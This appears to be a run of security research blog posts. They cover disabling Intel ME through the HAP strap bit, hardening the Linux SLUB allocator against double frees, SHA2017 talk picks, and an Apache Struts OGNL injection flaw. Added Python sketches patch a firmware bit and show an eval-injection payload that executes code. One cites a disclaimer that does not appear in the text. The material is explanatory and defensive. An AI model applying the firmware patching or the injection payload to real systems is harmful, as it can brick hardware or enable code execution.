Intel Management Engine is a proprietary technology that consists of a microcontroller integrated into the Platform Controller Hub (PCH) chip and a set of built-in peripherals. The PCH carries almost all communication between the processor and external devices; therefore Intel ME has access to almost all data on the computer. The ability to execute third-party code on Intel ME would allow for a complete compromise of the platform. We see increasing interest in Intel ME internals from researchers all over the world. One of the reasons is the transition of this subsystem to new hardware (x86) and software (modified MINIX as an operating system). The x86 platform allows researchers to make use of the full power of binary code analysis tools. Previously, firmware analysis was difficult because earlier versions of ME were based on an ARCompact microcontroller with an unfamiliar set of instructions.

Unfortunately, analysis of Intel ME 11 was previously impossible because the executable modules are compressed by Huffman codes with unknown tables. Nonetheless, our research team (Dmitry Sklyarov, Mark Ermolov, and Maxim Goryachy) managed to recover these tables and created a utility for unpacking images. The utility is available on our GitHub page.
After unpacking the executable modules, we proceeded to examine the software and hardware internals of Intel ME. Our team has been working on this for quite some time, and we have accumulated a large amount of material that we plan to publish. This is the first in a series of articles on the internals of Intel ME and how to disable its core functionality. Experts have long wondered about such an ability in order to reduce the risk of data leaks associated with any potential zero-day vulnerabilities in Intel ME.
How to disable ME
Some users of x86 computers have asked the question: how can one disable Intel ME? The issue has been raised by many, including Positive Technologies experts. And with the recently discovered critical (9.8/10) vulnerability in Intel Active Management Technology (AMT), which is based on Intel ME, the question has taken on new urgency.

The disappointing fact is that on modern computers, it is impossible to completely disable ME. This is primarily because this technology is responsible for initialization, power management, and launch of the main processor. Another complication is that some data is hard-coded inside the PCH chip, which functions as the southbridge on modern motherboards. The main method used by enthusiasts trying to disable ME is to remove everything "redundant" from the image while maintaining the computer's operability. But this is not so easy: if the built-in PCH code does not find ME modules in the flash memory, or detects that they are damaged, the system will not start.
The me_cleaner project, in development for several years, provides a special utility for deleting most of the image while leaving only the components vital for the main system. But even if the system starts, the joy is short-lived—after about 30 minutes, the system may shut down automatically. The reason is that, after some failures, ME enters Recovery Mode, in which it can operate only for a certain period of time. As a result, the cleaning process becomes more complicated. For example, with earlier versions of Intel ME, it was possible to reduce the image size to 90 KB, but the Intel ME 11 image can only be reduced to 650 KB.
Figure 1. Support for Skylake and later architectures in me_cleaner
Secrets in QResource
Intel allows motherboard manufacturers to set a small number of ME parameters. For this, the company provides hardware manufacturers with special software, including utilities such as Flash Image Tool (FIT) for configuring ME parameters and Flash Programming Tool (FPT) for programming flash memory directly via the built-in SPI controller. These programs are not provided to end users, but they can be easily found on the Internet.

Figure 2. Compressed XML files
From these utilities, you can extract a large number of XML files (detailed description of the process). These files contain a lot of interesting information: the structure of ME firmware and description of the PCH strap, as well as special configuration bits for various subsystems integrated into the PCH chip. One of the fields, called "reserve_hap", drew our attention because there was a comment next to it: "High Assurance Platform (HAP) enable".
Figure 3. PCH strap for High Assurance Platform
Googling did not take long. The second search result said that the name belongs to a trusted platform program linked to the U.S. National Security Agency (NSA). A graphics-rich presentation describing the program can be found here. Our first impulse was to set this bit and see what happens. Anyone with an SPI programmer or access to the Flash Descriptor can do this (on many motherboards, access rights to flash memory regions are set incorrectly).
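As a rough illustration of what "setting the bit" amounts to, here is a hypothetical Python sketch that patches one strap bit in a flash dump. The offset and bit position below are placeholders: the real location of the reserve_hap strap must be determined from the FIT configuration for the specific platform.

```python
def set_hap_bit(image, strap_offset, bit):
    """Set one PCH-strap bit in an SPI flash dump (returns a new image).

    strap_offset and bit are illustrative placeholders, not the real
    location of the reserve_hap strap.
    """
    data = bytearray(image)
    data[strap_offset] |= 1 << bit
    return bytes(data)

# Toy 16-byte "image" standing in for a real multi-megabyte dump
dump = bytes(16)
patched = set_hap_bit(dump, strap_offset=0x0A, bit=0)
```

The patched image would then be written back with an SPI programmer or FPT; as noted in the disclaimer above, experimenting with real flash contents risks bricking the machine.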
Figure 4. Status of ME after activating the HAP bit
After the platform is loaded, the MEInfo utility reports a strange status: "Alt Disable Mode." Quick checks showed that ME did not respond to commands or react to requests from the operating system. We decided to figure out how the system goes into this mode and what it means. By that time, we had already analyzed the main part of the BUP module, which is responsible for initialization of the platform and sets the status displayed by MEInfo. In order to understand how BUP works, a more detailed description of the Intel ME software environment is necessary.
Intel ME 11 architecture overview
Starting with the PCH 100 Series, Intel has completely redesigned the PCH chip. The architecture of the embedded microcontrollers was switched from ARC's ARCompact to x86. The Minute IA (MIA) 32-bit microcontroller was chosen as the basis; it is used in Intel Edison microcomputers and Quark SoCs, and is based on a rather old scalar Intel 486 microprocessor with the addition of a set of instructions (ISA) from the Pentium processor. However, for the PCH, Intel manufactures this core with 22-nm semiconductor technology, making the microcontroller highly energy-efficient. There are three such cores in the new PCH: Management Engine (ME), Integrated Sensors Hub (ISH), and Innovation Engine (IE). The latter two can be enabled or disabled depending on the PCH model and the target platform; the ME core is always enabled.

Figure 5. Three x86 processors in the PCH
Such an overhaul required changing ME software as well. In particular, MINIX was chosen as the basis for the operating system (previously, ThreadX RTOS had been used). Now ME firmware includes a full-fledged operating system with processes, threads, memory manager, hardware bus driver, file system, and many other components. A hardware cryptoprocessor supporting SHA256, AES, RSA, and HMAC is now integrated into ME. User processes access hardware via a local descriptor table (LDT). The address space of a process is also organized through an LDT—it is just part of the global address space of the kernel space whose boundaries are specified in a local descriptor. Therefore, the kernel does not need to switch between the memory of different processes (changing page directories), as compared to Microsoft Windows or Linux, for instance.
Keeping in mind this overview of Intel ME software, now we can examine how the operating system and modules are loaded.
Intel ME loading stages
Loading starts with the ROM program, which is contained in the built-in PCH read-only memory. Unfortunately, no way to read or rewrite this memory is known to the general public. However, one can find pre-release versions of ME firmware on the Internet containing the ROMB (ROM BYPASS) section, which, we can assume, duplicates the functionality of ROM. So by examining such firmware, it is possible to reproduce the basic functionality of the initialization program.

Examining ROMB reveals the purpose of ROM: performing hardware initialization (for example, initializing the SPI controller), verifying the digital signature of the FTPR header, and loading the RBE module located in the flash memory. RBE, in turn, verifies the checksums of the KERNEL, SYSLIB, and BUP modules and hands over control to the kernel entry point.
It should be noted that ROM, RBE, and KERNEL are executed at the zero privilege level (in ring-0) of the MIA kernel.
Figure 6. Verifying integrity of SYSLIB, KERNEL, and BUP in RBE
The first process that the kernel creates is BUP, which runs in its own address space in ring-3. The kernel does not launch any other processes itself; this is done by BUP itself, as well as a separate LOADMGR module, which we will discuss later. The purpose of BUP (BringUP platform) is to initialize the entire hardware environment of the platform (including the processor), perform primary power management functions (for example, starting the platform when the power button is pressed), and start all other ME processes. Therefore, it is certain that the PCH 100 Series or later is physically unable to start without valid ME firmware. Firstly, BUP initializes the power management controller (PMC) and the ICC controller. Secondly, it starts a whole string of processes; some of them are hard-coded (SYNCMAN, PM, VFS), and the others are contained in InitScript (similar to autorun), which is stored in the FTPR volume header and digitally signed.
Figure 7. Starting SYNCMAN and PM
Thus, BUP reads InitScript and starts all processes that conform to the ME startup type and are IBL processes.
Figure 8. Processing InitScript
Figure 9. List of modules with the IBL flag
If a process fails to start, BUP will not start the system. As shown in Figure 9, LOADMGR is the last IBL process on the list. It starts the remaining processes, but unlike BUP, if an error occurs during module startup, LOADMGR will just proceed to the next one.
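The startup logic described above can be modeled roughly as follows. The entries and flags are purely illustrative (per the text, SYNCMAN, PM, and VFS are actually hard-coded rather than read from InitScript, and real module names differ):

```python
# Hypothetical InitScript entries: (name, startup_type, is_ibl);
# the real list lives in the signed FTPR volume header
INIT_SCRIPT = [
    ("SYNCMAN", "ME", True),
    ("PM",      "ME", True),
    ("VFS",     "ME", True),
    ("LOADMGR", "ME", True),
    ("AMT",     "ME", False),  # non-IBL: left for LOADMGR to start later
]

def bup_start(entries, startup_type="ME"):
    # BUP starts only the entries matching the ME startup type AND
    # flagged IBL; a failure at this point is fatal, so the system
    # would not start at all
    started = []
    for name, stype, is_ibl in entries:
        if stype == startup_type and is_ibl:
            started.append(name)
    return started
```

This models the key asymmetry: BUP treats any IBL startup failure as fatal, while LOADMGR, started last, simply skips modules that fail.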
This means that the first way to "slim down" Intel ME is to remove all modules that do not have the IBL flag in InitScript, which will significantly reduce the firmware size. But our initial task was to find out what happens to ME in HAP mode. For this, let us examine the BUP software model.
Figure 10. Startup of modules in ME
BringUP
If you look closely at how the BUP module works, you can see that a classic finite state machine is implemented inside it. Execution is functionally divided into two components: the initialization stages (the state machine proper) and servicing requests from other processes after the system is initialized. The number of initialization stages may vary depending on the platform and SKU (TXE, CSME, SPS, consumer, corporate), but the main stages are common to all versions.

Stage 1
During the initial stage, the sfs internal diagnostic file system (SUSRAM FS, a file system located in non-volatile memory) is created, the configuration is read, and, most importantly, the PMC is queried about what caused the startup: power-on of the platform, restart of the entire platform, ME restart, or waking up from sleep. This stage is called boot flow determination, and the subsequent stages of the initialization state machine depend on it. In addition, several modes are supported: normal and a set of service modes in which the main ME functionality is disabled (HAP, HMRFPO, TEMP_DISABLE, RECOVERY, SAFE_MODE, FW_UPDATE, and FD_OVERRIDE).

Stage 2
At the next stage, the ICC controller is initialized and the ICC profile (responsible for the clock frequencies of the main consumers) is loaded. Boot Guard is initialized, and cyclic polling for processor startup confirmation is started.

Stage 3
BUP awaits a message from the PMC confirming that the main processor has started. After that, BUP starts the PMC asynchronous polling cycle for power events (restart or shutdown of the platform) and proceeds to the next stage. If such an event occurs, BUP will perform the requested action between the initialization stages.

Stage 4
At this stage, internal hardware is initialized. Also, BUP starts the heci (a special device designed to receive commands from the BIOS or the operating system) polling cycle for the DID (DRAM Init Done message) from the BIOS. It is this message that allows ME to determine that the main BIOS has initialized RAM and reserved a special region, UMA, for ME, and then proceed to the next stage.

Stage 5
Once the DID is received, BUP—depending on the mode, which is determined by various factors—either starts IBL processes from InitScript (in normal mode) or hangs in a loop, which it can exit only when it receives a message from the PMC, for example as a result of a request to restart or shut down the system.

It is at this stage that we find HAP processing; in this mode, BUP hangs instead of executing InitScript. This means that the remaining sequence of actions in normal mode has nothing to do with HAP and will not be considered. The main thing we would like to note is that in HAP mode, BUP initializes the entire platform (ICC, Boot Guard) but does not start the main ME processes.
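The five stages and the HAP short-circuit can be summarized in a toy model. This is not actual BUP code; the stage descriptions merely paraphrase the text above:

```python
def run_bup(mode="normal"):
    # Simplified model of the BUP initialization state machine
    log = []
    log.append("stage1: boot flow determination (query PMC)")
    log.append("stage2: init ICC, load ICC profile, init Boot Guard")
    log.append("stage3: wait for PMC: main processor started")
    log.append("stage4: init internal hardware, wait for DID over heci")
    if mode == "HAP":
        # HAP: the platform is fully initialized, but InitScript is
        # never executed -- BUP idles, reacting only to PMC power events
        log.append("stage5: idle (main ME functionality disabled)")
    else:
        log.append("stage5: execute InitScript, start IBL processes")
    return log
```

The model captures the essential point: in HAP mode the divergence happens only at Stage 5, after platform initialization is already complete.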
Figure 11. Determining HAP mode
Figure 12. Switching ME to Stage 5 causing it to hang
Figure 13. Stage 5
Setting the HAP bit
The aforementioned facts help to reveal the second method of disabling Intel ME:1. Set the HAP bit.So how can we set the HAP bit? We can use the FIT configuration files and determine the location of the bit in the image, but there is a simpler way. In the ME Kernel section of FIT, you can find a Reserved parameter. This is the particular bit that enables HAP mode.
2. In the CPD section of the FTPR, remove or damage all modules except those required by BUP for startup:
- RBE
- KERNEL
- SYSLIB
- dBUP
3. Fix the checksum of the CPD header (for more details on the structure of ME firmware, see this paper).
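Once the bit's location is known (determined from FIT, as described above), setting it in a flash image dump is a one-line patch. A minimal sketch follows; the byte offset and bit position are placeholders, and the real values must be taken from the FIT configuration for the specific platform.

```python
# Hedged sketch: set one bit in a firmware image dump.
# HAP_BYTE_OFFSET and HAP_BIT are PLACEHOLDERS, not real values;
# obtain the actual location from FIT for your platform.

HAP_BYTE_OFFSET = 0x102  # hypothetical offset of the strap byte
HAP_BIT = 0              # hypothetical bit position within that byte

def set_hap_bit(image: bytes) -> bytes:
    data = bytearray(image)
    data[HAP_BYTE_OFFSET] |= 1 << HAP_BIT
    return bytes(data)

image = bytes(0x1000)                 # stand-in for a real SPI flash dump
patched = set_hap_bit(image)
print(hex(patched[HAP_BYTE_OFFSET]))  # → 0x1
```

Remember that after modifying the image you would still need to fix the CPD header checksum, as step 3 notes; this sketch covers only the bit flip itself.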
Figure 14. HAP mode activation bit
HAP and Boot Guard
We also found some code in BUP that, when HAP mode is enabled, sets an additional bit in the Boot Guard policies. Unfortunately, we have not succeeded in finding out what this bit controls.
Figure 15. Setting an additional bit for Boot Guard
Support for ME 11 in me_cleaner
While this article was being prepared, the me_cleaner developers updated their utility. It now also removes all the modules from the image except RBE, KERNEL, SYSLIB, and BUP, but it does not set the HAP bit; instead, this forces ME into TemporaryDisable mode. We were curious to find out what happens with this approach.
We found that deleting the partitions containing the ME file system results in an error during reading of the cfg_rules file. This file contains a number of different system settings, among them, we believe, the flag we called "bup_not_temporary_disable". If this flag is not set, the entire subsystem switches to TemporaryDisable mode; and since the flag is a global variable initialized to zero, the read error is treated as a configuration that requires disablement.
We also checked the firmware of the server and mobile versions of ME (SPS 4.x and TXE 3.x). In the server version, this flag is always set to 1; in the mobile version, it is ignored. This means that this method will not work on the server and mobile (Apollo Lake) versions of ME.
Figure 16. Reading the cfg_rules file
Closing thoughts
So we have found an undocumented PCH strap that can be used to switch on a special mode disabling the main Intel ME functionality at an early stage. We can prove this with the following facts:
- Binary analysis of Intel ME firmware, as described in this paper.
- If we remove some critical ME modules and enable HAP mode, Intel ME does not crash. This proves that HAP disables ME at an early stage.
- We are quite sure that Intel ME is unable to exit this mode because we have not found code capable of doing so in the RBE, KERNEL, and SYSLIB modules.
Similarly, we are sure that the ROM integrated into the PCH is practically the same as ROMB, which also does not contain any code allowing an exit from HAP mode.
Hence HAP protects against vulnerabilities present in all modules except RBE, KERNEL, SYSLIB, ROM, and BUP. Unfortunately, however, this mode does not protect against the exploitation of errors at earlier stages.
Intel representatives have been informed about the details of our research. Their response has confirmed our hypothesis about the connection of the undocumented mode with the High Assurance Platform program. With their permission, we quote Intel's answer below:
Mark/Maxim,
In response to requests from customers with specialized requirements we sometimes explore the modification or disabling of certain features. In this case, the modifications were made at the request of equipment manufacturers in support of their customer’s evaluation of the US government’s “High Assurance Platform” program. These modifications underwent a limited validation cycle and are not an officially supported configuration.
We believe that this mechanism is designed to meet a typical requirement of government agencies, which want to reduce the possibility of side-channel leaks. But the main question remains: how does HAP affect Boot Guard? Due to the closed nature of this technology, it is not possible to answer this question yet, but we hope to do so soon.
Mark Ermolov, Maxim Goryachy
↧
↧
Blocking double-free in Linux kernel
On August 7, Positive Technologies expert Alexander Popov gave a talk at SHA2017. SHA stands for Still Hacking Anyway; it is a big outdoor hacker camp in the Netherlands.
The slides and recording of Alexander's talk are available.
This short article describes some new aspects of Alexander's talk, which haven't been covered in our blog.
The general method of exploiting a double-free error is based on turning it into a use-after-free bug. That is usually achieved by allocating a memory region of the same size between the two free() calls (see the diagram below); this technique is called heap spraying.
However, in the case of CVE-2017-2636, which Alexander exploited, 13 buffers are freed straight away, and the double freeing happens at the beginning. So the usual heap spraying described above doesn't work for this vulnerability. Nevertheless, Alexander managed to turn that state of the system into a use-after-free error by abusing the naive behaviour of SLUB, which is currently the main Linux kernel allocator.
It turned out that SLUB allows consecutive double freeing of the same memory region. In contrast, the GNU C library allocator has a "fasttop" check against this, which introduces only a relatively small performance penalty. The idea is simple: report an error on freeing a memory region if its address is the same as that of the last region on the allocator's freelist.
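The fasttop idea can be illustrated with a toy freelist model. This is a deliberate simplification in Python, not the actual glibc or SLUB code: only the most recently freed address is compared, so the check costs a single comparison and catches consecutive double frees, but nothing more.

```python
# Toy model of a freelist with a "fasttop"-style double-free check:
# freeing a chunk that is already at the top of the freelist raises
# an error instead of corrupting the list. Illustrative only; the
# real glibc and SLUB code paths are far more involved.

class FreelistError(Exception):
    pass

class Freelist:
    def __init__(self):
        self._list = []

    def free(self, chunk_addr):
        # The cheap check: compare only against the most recently
        # freed chunk, so the cost is one comparison per free().
        if self._list and self._list[-1] == chunk_addr:
            raise FreelistError("double free of %#x" % chunk_addr)
        self._list.append(chunk_addr)

    def alloc(self):
        return self._list.pop()

fl = Freelist()
fl.free(0x1000)        # first free: fine
try:
    fl.free(0x1000)    # consecutive double free: detected
    detected = False
except FreelistError:
    detected = True
print(detected)        # → True
fl.free(0x2000)        # a different chunk freed in between...
fl.free(0x1000)        # ...lets this double free go unnoticed: the
                       # check is deliberately cheap, not complete
```

The last two lines show why the check blocks only *consecutive* double frees: the comparison against a single list head is the source of the small performance penalty mentioned above.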
A similar check in SLUB would block some double-free exploits in the Linux kernel (including Alexander's PoC exploit for CVE-2017-2636). So Alexander modified the set_freepointer() function in mm/slub.c and sent a patch to the Linux Kernel Mailing List (LKML), which provoked a lively discussion.
The SLUB maintainers didn't like that this check:
- introduces some performance penalty for the default SLUB functionality;
- duplicates some part of already existing slub_debug feature;
- causes a kernel oops in case of a double-free error.
Alexander replied with his arguments:
- slub_debug is not enabled in Linux distributions by default (due to the noticeable performance impact);
- when the allocator detects a double-free, some severe kernel error has already occurred on behalf of some process. So it might not be worth trusting that process (which might be an exploit).
Finally, Kees Cook helped negotiate adding Alexander's check behind the CONFIG_SLAB_FREELIST_HARDENED kernel option. The second version of Alexander's patch has been accepted and applied to the linux-next branch, and it should reach the Linux kernel mainline in the near future.
We hope that in the future some popular Linux distributions will ship kernels with security hardening options (including CONFIG_SLAB_FREELIST_HARDENED) enabled by default.
↧
12 Great Technical Talks at SHA2017
image credit Arron Dowdeswell @Arronandir
SHA2017 is a large outdoor hacker camp that took place in the Netherlands from August 4th to 8th. Despite intensive preparation for his own talk at the event, Positive Technologies expert Alexander Popov attended many interesting lectures. In this article, Alexander shares his impressions and lists the 12 technical talks at SHA2017 that he liked the most.
1. How the NSA tracks you
Bill Binney gave the keynote, describing how the NSA tracks us. On the one hand, the topic is no longer a sensation today. On the other hand, this man had a 34-year career at the NSA, ultimately becoming its Technical Director. During his talk I was sitting in the front row, and I was really impressed by the speaker's piercing gaze.
The recording:
2. Mathematics and Video Games
An entertaining and funny talk about the applications of graph theory and topology in the nice old games like Pacman and Space Invaders.
The recording:
3. Automotive Microcontrollers. Safety != Security
A very interesting lecture about hacking automotive systems using fault injection: voltage or electromagnetic glitches, laser shooting and other cool hacks. The researchers described why meeting the ISO 26262 standard requirements of functional safety does not help against low-level attacks.
The recording:
4. DNA: The Code of Life
An excellent lecture by Bert Hubert about DNA from the information technologies perspective. Not only is he a charismatic speaker, but also his talk was well prepared for the hacker conference. So the hour flew by and I found myself fascinated by the way God encoded life with DNA.
The recording:
5. Improving Security with Fuzzing and Sanitizers
A cool talk on a highly relevant topic from a very famous German security researcher - Hanno Böck. I gained some new ideas about fuzzing methods and used the opportunity to ask Hanno some questions about Sanitizers.
The recording:
6. Race for Root: Analysis of the Linux Kernel Race Condition Exploit
A very good technical talk, let me recommend it ;) I described the CVE-2017-2636 vulnerability, which I found in the Linux kernel, explained my PoC exploit for it and showed the local privilege escalation demo.
The recording:
The slides.
I would like to note that the Linux kernel maintainers have accepted my patch which blocks similar exploits. More technical details are available at the Positive Technologies blog.
7. Flip Feng Shui
One of the most notable talks of SHA2017. Victor van der Veen and Kaveh Razavi are renowned information security researchers. They have just won the prestigious PWNIE award for exploiting the Rowhammer hardware bug to attack cloud and mobile platforms. The speakers effectively explained their exploits and showed nice demos.
The recording:
8. Computational Thinking
An interesting and entertaining lecture by Pauline Maas, who shared her successful experience of getting young children and teenagers involved in programming, DIY, and computational thinking in general. Yes, it is fun!
The recording:
9. Bypassing Secure Boot using Fault Injection
An impressive technical talk about fault injection attacks. The audience, myself included, was impressed by the live demo of bypassing Secure Boot checks on ARM using voltage glitches.
The recording:
10. Rooting the MikroTik Routers
A high quality technical talk with live demos of hacking the MikroTik industrial routers. At the end Kirils Solovjovs made his router beep a nice tune. The audience liked it.
The recording:
11. Off Grid: Disclosing Your 0days in a Videogame Mod
A really cool talk about a really cool hacking videogame called Off Grid. You play as a hacker breaking into systems in a huge corporate building. The software on the desktops, smartphones, and IoT devices you hack actually runs on virtual machines, so it's real fun :) Moreover, the game allows you to practice social engineering and other tricks. The Off Grid developers showed some live demos of the gameplay, and the audience appreciated that a lot.
The recording:
12. FaceDancer 2.0
A very interesting lecture by the developers of FaceDancer 2.0, an improved technology for fuzzing various USB software stacks. In fact, the Linux kernel and other operating systems have the wrong security policy regarding trust in hardware. In particular, USB software stacks usually assume correct behaviour of everything attached via USB. That wrong assumption is what makes BadUSB attacks so effective. FaceDancer 2.0 provides rich capabilities for fuzzing USB hosts and making them more robust.
The recording:
Eh, SHA2017 is over... But Still Hacking Anyway!
↧
New Apache Struts vulnerability allows remote code execution
A new security flaw detected in Apache Struts allows an unauthenticated attacker to execute arbitrary code on a vulnerable system.
Although the Apache Software Foundation classified it as a medium severity vulnerability, Cisco has outlined a long list of its products in the Security Advisory that are affected by this flaw.
Extent of the problem
The vulnerability resides in the FreeMarker functionality of the Apache Struts 2 package. The FreeMarker Template Language is widely used in Apache Struts and numerous Java-based projects. Developers can use it to bind parameter values sent from a user application to the server to variables declared inside the application.
Incorrect processing makes it possible for attackers to send Object Graph Navigation Language (OGNL) expressions to the server, where their evaluation can cause arbitrary code execution.
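As a language-agnostic illustration of the mechanism (a deliberately simplified Python analogy, not Struts or FreeMarker code): this vulnerability class boils down to evaluating user-controlled text as an expression instead of substituting it as plain data.

```python
# Simplified analogy of an expression-injection flaw. NOT Struts code:
# a toy "template engine" that mistakenly evaluates user input.

def render_safe(template: str, user_value: str) -> str:
    # Correct: user input is substituted as plain data.
    return template.replace("${name}", user_value)

def render_unsafe(template: str, user_value: str) -> str:
    # Flawed: the substituted text is then evaluated as an expression,
    # so expression syntax inside user input gets executed.
    return str(eval(template.replace("${name}", user_value)))

template = "'Hello, ${name}'"
print(render_safe(template, "world"))    # the literal template text
print(render_unsafe(template, "world"))  # → Hello, world

# A crafted value breaks out of the string and runs attacker code:
payload = "' + __import__('platform').system() + '"
result = render_unsafe(template, payload)  # executes platform.system()
```

In the real vulnerability the evaluated language is OGNL rather than Python, but the failure mode is the same: data and code share one evaluation context, and a crafted parameter value crosses from one to the other.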
Currently, the vulnerability is confirmed in several Cisco products:
- Cisco Digital Media Manager — no patch will be issued as the product support was officially ceased on August 19, 2016
- Cisco Hosted Collaboration Solution for Contact Center
- Cisco Unified Contact Center Enterprise
- Cisco Unified Intelligent Contact Management Enterprise
Over 20 Cisco products are still under investigation to determine whether they are affected. Finalized information will be available in a Security Advisory update.
Not only Cisco: breaking into Equifax
Apart from CVE-2017-12611 (S2-053), several similar security flaws, including CVE-2017-9805 (S2-052), CVE-2017-9791 (S2-048), and CVE-2017-5638 (S2-045), had already been detected in Apache Struts. Media reports indicated that hackers exploited an Apache Struts vulnerability to steal client records from the credit reporting agency Equifax. Exact details of the attack are still being confirmed.
According to Leigh-Anne Galloway, an expert at Positive Technologies, such attacks can be used to steal credit card data, or to use information about people with good credit scores to defraud banks and obtain loans.
Moreover, Equifax's website used to set up credit account monitoring also turned out to have a vulnerability hackers could exploit to steal users' data.
In the aftermath of the Equifax breach, the Apache Struts development team issued a statement recommending that all users of the framework use dedicated tools to ensure infrastructure security. One such tool for preventing attacks that exploit vulnerabilities of this kind is a WAF (we develop our own, PT Application Firewall).
How to protect yourself
Although a number of Cisco products are vulnerable to CVE-2017-12611, it is unlikely to have large-scale consequences, because an application must have a specific configuration for the vulnerability to be exploited successfully. If developers do not use FreeMarker Template Language constructs, or use exclusively read-only entities to initialize attributes, the flaw cannot be exploited.
Moreover, Positive Technologies recommends that application developers install Apache Struts version 2.5.12 or 2.3.34, which contain a more restrictive FreeMarker configuration, further reducing the risk of a successful attack.
↧